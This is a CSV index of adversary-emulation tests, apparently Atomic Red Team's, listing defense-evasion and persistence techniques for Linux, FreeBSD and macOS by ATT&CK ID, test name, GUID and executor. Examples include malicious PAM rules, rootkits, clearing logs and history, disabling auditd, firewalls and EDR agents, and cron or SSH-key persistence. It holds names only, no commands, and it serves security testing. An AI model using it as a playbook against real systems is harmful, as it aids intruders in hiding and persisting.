defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",10,chflags - Remove immutable file attribute,60eee3ea-2ebd-453b-a666-c52ce08d2709,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",11,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",12,Chmod through c script (freebsd),da40b5fe-3098-4b3b-a410-ff177e49ee2e,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",13,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1222.002,"File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification",14,Chown through c script (freebsd),eb577a19-b730-4918-9b03-c5edcf51dc4e,sh
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,1,Decode Eicar File and Write to File,7693ccaa-8d64-4043-92a5-a2eb70359535,powershell
defense-evasion,T1027.013,Obfuscated Files or Information: Encrypted/Encoded File,2,Decrypt Eicar File and Write to File,b404caaa-12ce-43c7-9214-62a531c044f7,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",2,rm -rf,bd8ccc45-d632-481e-b7cf-c467627d68f9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",5,Truncate system log files via truncate utility (freebsd),14033063-ee04-4eaf-8f5d-ba07ca7a097c,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",7,Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd),369878c6-fb04-48d6-8fc2-da9d97b3e054,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",10,Overwrite FreeBSD system log via echo utility,11cb8ee1-97fb-4960-8587-69b8388ee9d9,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",13,Delete system log files via unlink utility (freebsd),45ad4abd-19bd-4c5f-a687-41f3eee8d8c2,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",18,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",19,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",20,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (truncate),47966a1d-df4f-4078-af65-db6d9aa20739,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,bash
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Clear Docker Container Logs,553b39f9-1e8c-47b1-abf5-8daf7b0391e9,bash
defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Base64 decoding with shell utilities (freebsd),b6097712-c42e-4174-b8f2-4b1e1a5bbb3d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,FreeBSD b64encode Shebang in CLI,18ee2002-66e8-4518-87c5-c0ec9c8299ac,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,8,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,9,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
defense-evasion,T1140,Deobfuscate/Decode Files or Information,10,XOR decoding and command execution using Python,c3b65cd5-ee51-4e98-b6a3-6cbdec138efc,bash
defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,2,Copy and Delete Mailbox Data on Linux,25e2be0e-96f7-4417-bd16-a4a2500e3802,bash
defense-evasion,T1070.008,Email Collection: Mailbox Manipulation,5,Copy and Modify Mailbox Data on Linux,6d99f93c-da56-49e3-b195-163090ace4f6,bash
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
defense-evasion,T1497.003,Time Based Evasion,1,Delay execution with ping,8b87dd03-8204-478c-bac3-3959f6528de3,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,8,Stop/Start Packet Filter,0ca82ed1-0a94-4774-9a9a-a2c83a8022b7,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,9,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,10,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,11,Add and delete UFW firewall rules,b2563a4e-c4b8-429c-8d47-d5bcb227ba7a,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,12,Add and delete Packet Filter rules,8b23cae1-66c1-41c5-b79d-e095b6098b5b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,Edit UFW firewall user.rules file,beaf815a-c883-4194-97e9-fdbbb2bbdd7c,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall ufw.conf file,c1d8c4eb-88da-4927-ae97-c7c25893803b,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Edit UFW firewall sysctl.conf file,c4ae0701-88d3-4cd8-8bce-4801ed9f97e4,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,16,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,17,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,18,Disable iptables,7784c64e-ed0b-4b65-bf63-c86db229fd56,sh
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,19,Modify/delete iptables firewall rules,899a7fb5-d197-4951-8614-f19ac4a73ad4,sh
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,1,Delete all auditd rules using auditctl,33a29ab1-cabb-407f-9448-269041bf2856,sh
defense-evasion,T1562.012,Impair Defenses: Disable or Modify Linux Audit System,2,Disable auditd using auditctl,7906f0a6-b527-46ee-9026-6e81a9184e08,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,10,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configuration Changes on FreeBSD Host,cedaf7e7-28ee-42ab-ba13-456abd35d1bd,sh
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,4,Hiding a malicious process with bind mounts,ad4b73c2-d6e2-4d8b-9868-4c6f55906e01,sh
defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,4,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,5,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,6,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,7,Setting the HISTSIZE environment variable,386d3850-2ce7-4508-b56b-c0558922c814,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,8,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,9,Setting the HISTFILE environment variable (freebsd),f7308845-6da8-468e-99f2-4271f2f5bb67,sh
defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,10,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable syslog (freebsd),db9de996-441e-4ae0-947b-61b6871e2fdf,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,59,Disable ASLR Via sysctl parameters - Linux,ac333fe1-ce2b-400b-a117-538634427439,bash
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on FreeBSD,f4568003-1438-44ab-a234-b3252ea7e7a3,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,sh
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,1,Delete a single file - FreeBSD/Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,2,Delete an entire folder - FreeBSD/Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh
defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,8,Delete Filesystem - Linux,f3aa95fe-4f10-4485-ad26-abf22a764c52,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Obfuscated Files or Information: Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1036.006,Masquerading: Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,sh
defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,1,Create a hidden file in a hidden directory,61a782e5-9a19-40b5-8ba4-69a4b9f3d7be,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
defense-evasion,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
defense-evasion,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
persistence,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
persistence,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
persistence,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Create Account: Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Create Account: Local Account,2,Create a user account on a FreeBSD system,a39ee1bc-b8c1-4331-8e5f-1859eb408518,sh
persistence,T1136.001,Create Account: Local Account,6,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Create Account: Local Account,7,Create a new user in FreeBSD with `root` GID.,d141afeb-d2bc-4934-8dd5-b7dba0f9f67a,sh
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,sh
persistence,T1136.002,Create Account: Domain Account,4,Active Directory Create Admin Account,562aa072-524e-459a-ba2b-91f1afccf5ab,sh
persistence,T1136.002,Create Account: Domain Account,5,Active Directory Create User Account (Non-elevated),8c992cb3-a46e-4fd5-b005-b1bab185af31,sh
persistence,T1547.006,Boot or Logon Autostart Execution: Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
persistence,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,sh
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
